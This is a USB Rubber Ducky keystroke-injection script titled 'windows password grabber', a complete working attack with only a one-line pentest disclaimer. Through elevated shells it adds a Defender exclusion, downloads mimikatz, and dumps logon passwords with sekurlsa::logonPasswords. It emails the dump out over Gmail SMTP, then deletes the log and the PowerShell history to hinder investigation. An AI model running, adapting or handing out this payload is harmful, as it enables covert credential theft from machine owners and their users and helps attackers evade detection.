REM Title: windows password grabberREM Arthor makozort, https://github.com/makozortREM Target: windows 10 (with admin access), might work with windows 7 idkREM THIS IS FOR AUTHORISED USE ON MACHINES YOU EITHER OWN OR HAVE BEEN GIVEN ACCESS TO PEN TEST, MAKOZORT IS NO LIABLE FOR ANY MISUSE OF THIS SCRIPTREM --------------set default delay based on targets computer speed, 350 is around mid range (I think)DEFAULT_DELAY 350REM -------------first delay is 1 second (you may need more) to let windows set up the "keyboard"DELAY 1000REM ------------open powershell as admin and set an exclusion path in the C:\Users pathGUI rSTRING powershellCTRL-SHIFT ENTERDELAY 600ALT ySTRING Set-MpPreference -ExclusionPath C:\UsersENTERSTRING exitENTERREM -------------download mimikatzGUI rSTRING cmdCTRL-SHIFT ENTERDELAY 600ALT ySTRING powershell (new-object System.Net.WebClient).DownloadFile('LINK TO MIMIKATZ.EXE DOWNLOAD HERE','%temp%\pw.exe')ENTERREM ------------run the following mimikatz commands and print results in new txt fileDELAY 4000STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt;ENTER STRING privilege::debugENTERSTRING sekurlsa::logonPasswords fullENTERSTRING exitENTERREM< --------- delete mimikatzSTRING del %TEMP%\pw.exeENTERSTRING exitENTERREM -------------email the pwlog.txt to your emailGUI rSTRING powershellCTRL-SHIFT ENTERDELAY 600ALT ySTRING Remove-MpPreference -ExclusionPath C:\UsersENTERSTRING $SMTPServer = 'smtp.gmail.com'ENTERSTRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)ENTERSTRING $SMTPInfo.EnableSsl = $trueENTERSTRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@SHIFT 2STRING gmail.com', 'PASSWORDHERE');ENTERSTRING $ReportEmail = New-Object System.Net.Mail.MailMessageENTERSTRING $ReportEmail.From = 'THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@SHIFT 2STRING gmail.com'ENTERSTRING $ReportEmail.To.Add('THE-PART-OF-RECEIVERS-EMAIL-BEFORE-THE-@SHIFT 2STRING gmail.com')ENTERSTRING $ReportEmail.Subject = 'Hello from the ducky'ENTERSTRING $ReportEmail.Body = 'Attached is your duck report.'ENTERSTRING $ReportEmail.Attachments.Add('c:\pwlog.txt')ENTERSTRING $SMTPInfo.Send($ReportEmail)ENTERDELAY 4000STRING exitENTERREM ------cleanup timeGUI rSTRING powershellCTRL-SHIFT ENTERDELAY 600ALT yREM ----------delete the txt fileSTRING del c:\pwlog.txtENTERREM -------remove powershell history (this probably wont be enough to remove all traces of you, this is just to prevent inital investigationsSTRING Remove-Item (Get-PSreadlineOption).HistorySavePathENTERSTRING exitENTERREM ------lock the pcGUI l